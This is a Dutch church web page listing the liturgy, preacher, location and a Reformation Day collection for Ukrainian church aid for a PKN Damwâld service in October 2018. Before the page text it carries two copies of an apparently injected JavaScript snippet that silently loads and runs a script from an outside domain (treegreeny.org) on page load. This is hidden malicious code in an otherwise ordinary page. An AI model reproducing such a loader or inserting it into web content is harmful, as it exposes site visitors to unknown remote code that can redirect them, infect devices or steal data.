;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 28 oktober 2018 9:30 uur - PKN Damwâld
zondag 28 oktober 2018
09:30 uur

Kerkdienst zondag 28 oktober 2018 9:30 uur

Thema: Wij dienen een heilige God ! Wees heilig ,want Ik ben heilig !

Informatie

Voorganger:Ds. M.J. Koppe, Dokkum
Thema:Wij dienen een heilige God ! Wees heilig ,want Ik ben heilig !
Liturgie
Lied voor de dienst : Gez 457 : 1,3 en 4
Binnenkomst en welkom
Intochtslied : Ps 24 : 2,3 en 5
Stil gebed /votum en groet
We zingen: Klein Gloria
Gebed van verootmoediging
We zingen: Ps 32 : 2 en 3
Wetslezing .
We zingen: Ps 119 : 14 en 30
Gebed om de Heilige Geest
We lezen: I Sam. 5 : 1 –12
We zingen: Gez 326 : 1 en 2
Verkondiging :
We zingen: Gez 75 : 1,5,6 en 7
Dankzegging en voorbeden
Collecte
Slotlied : Gez 462 : 1 t/m 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Hervormingsdag - De Kerk als goede buur

In Oekraïne heerst grote armoede, veroorzaakt door de economische crisis en het militaire conflict in het oosten van het land. Veel gezinnen moeten rondkomen van minder dan € 50,00 euro per maand. Een sociaal vangnet ontbreekt en door corruptie en bureaucratie is er weinig vertrouwen in de staat. Mensen hebben daarentegen veel vertrouwen in de kerk. Met het project "De Goede Buur"stimuleert en helpt de Lviv Education Foundation (LEF) lokale kerken om sociale initiatieven te ontplooien, zoals een zomerkamp voor kinderen uit arme gezinnen. LEF werkt vooral samen met jonge predikanten en gemeenteleden, omdat de jonge generatie enthousiast is en gelooft in verandering. De opbrengst van deze Hervormingsdagcollecte wordt gebruikt om 120 vrijwilligers van acht lokale kerken die zoeken naar vernieuwing te begeleiden om sociale initiatieven op te zetten.

Tweede collecte: Kerk
Uitganscollecte: Kerk